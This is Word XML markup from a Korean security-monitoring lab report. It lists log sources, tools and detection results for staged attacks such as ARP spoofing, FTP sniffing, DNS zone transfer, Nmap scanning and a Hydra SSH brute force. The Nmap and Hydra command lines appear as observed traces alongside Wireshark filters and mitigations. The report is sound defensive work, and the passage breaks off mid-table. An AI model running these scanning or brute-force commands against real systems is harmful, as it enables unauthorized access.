              </w:rPr>
              <w:t>경보 화면 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SID/Message/시간/출발지·목적지 포함</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1361" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>터미널</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1361" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>TERM-5-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>명령/출력 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>명령 전체와 결과(리턴코드 포함)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1361" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>로그</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1361" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>LOG-5-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>로그 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>경로/타임스탬프/키워드 강조</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>그림 5-1. 관제→분석→대응→정책 반영 흐름(증빙 삽입)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3118" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: IMG-5-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>흐름도/아키텍처(관제 플랫폼, 로그 수집, 차단 지점, 대시보드 등) 이미지를 삽입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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
        </w:rPr>
        <w:t>5.1. 관제 수행 결과</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
        </w:rPr>
        <w:t>관제 수행은 네트워크 패킷 분석(Wireshark)과 서버 로그(auth.log/syslog/apache/kern) 분석을 병행하여 정상/비정상 행위의 판별 기준을 정의하고, 시나리오 기반 공격 수행 시 생성되는 흔적을 식별·분류하는 방식으로 진행하였다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-4. 수집 로그/데이터 및 확인 포인트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w="1474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데이터</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515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수집 위치(예시)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515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확인 포인트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증빙 ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>패킷 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>(관제 PCAP 저장소)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>ARP 변조/스캔/FTP 평문/HTTP 요청 등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PCAP-5-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>인증 로그</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>/var/log/auth.log (또는 /var/log/secure)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SSH 스캔/브루트포스/로그인 성공·실패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LOG-5-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>시스템 로그</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>/var/log/syslog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>DNS AXFR 전송 시작/종료, 서비스 이벤트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LOG-5-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>웹 접근 로그</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>/var/log/apache2/*.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>정찰(whatweb)/SQLi/Command Injection 접근 패턴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LOG-5-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>커널/네트워크</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>/var/log/kern.log 또는 dmesg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SYN Flooding 등 DoS 징후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LOG-5-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>방화벽</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>UFW/iptables 로그(필요 시)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>차단 발생 시점/대상 IP/포트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LOG-5-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-5. 사용 도구 및 활용 목적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3213"/>
        <w:gridCol w:w="3213"/>
        <w:gridCol w:w="3213"/>
      </w:tblGrid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도구</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4252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활용 목적</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118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산출물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Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4252" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>패킷 필터 기반 정상/비정상 트래픽 식별</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>필터/판별 기준, 캡처 이미지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서버 로그 분석(tail/grep)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4252" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>공격 시나리오별 로그 패턴 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>핵심 로그 경로, 키워드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UFW/iptables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4252" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>시나리오별 차단 정책 적용(접근통제/율제한) 및 재현 검증</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>차단 규칙, 적용/검증 결과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(선택) Snort/관제 플랫폼</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4252" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>탐지 룰 기반 경보 생성 및 상관관계 분석</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>룰셋/경보 화면(증빙)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-6. 시나리오별 탐지 결과 요약(패킷·로그)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w="794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번호</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494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공격 시나리오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관제 데이터</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928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식별 기준(요약)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814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관측 결과(요약)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814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후속 조치</w:t>
            </w:r>
          </w:p>
        </w:tc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증빙 ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>S1-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>ARP Spoofing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>(동일 IP에 대한 MAC 주소 지속 변조)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패킷</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Wireshark 필터: arp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>동일 IP의 ARP Reply에서 MAC 변경 반복(비정상 징후)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>스위치 보안(DAI)·정적 ARP·탐지 룰 적용 검토</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>WS-5-01/PCAP-5-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>S1-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>FTP 패킷 스니핑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>(평문 Payload 내 계정정보 노출)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패킷</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Wireshark 필터: ftp || tcp.port == 21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Payload 구간에서 인증정보 노출 여부 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>FTP 사용 제한 및 SFTP/FTPS 전환 권고</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>WS-5-02/PCAP-5-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>S1-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Nmap 스캔(SSH 서비스 식별)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>(포트 존재/버전 수집(정찰))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패킷+auth.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Wireshark: tcp.flags.syn == 1 / 로그: 사용자·비번 실패/세션 생성 없음</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>nmap -sV -p 22 10.4.0.3 수행 흔적이 auth.log에 기록</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>관리망만 SSH 허용 및 스캔 차단(iptables recent) 적용</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>LOG-5-01/TERM-5-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>S1-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SSH Brute Force(Hydra)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>(짧은 시간 대량 인증 실패 및 MaxStartups throttling)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패킷+auth.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Wireshark: tcp.port == 22 / 로그: 동일 IP 반복 실패</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>hydra -l root -P /root/test.txt 10.4.0.3 ssh 수행 시도 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>키 기반 인증 전환 + 자동 차단(60초/5회) 적용</w:t>
            </w:r>
          </w:p>
        </w:tc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</w:rPr>
              <w:t>LOG-5-01/TERM-5-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>S1-5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>DNS AXFR(Zone Transfer)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>(존 파일 무단 전송(정보 노출))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패킷+syslog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Wireshark: tcp.port == 53 / syslog: AXFR started/ended</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
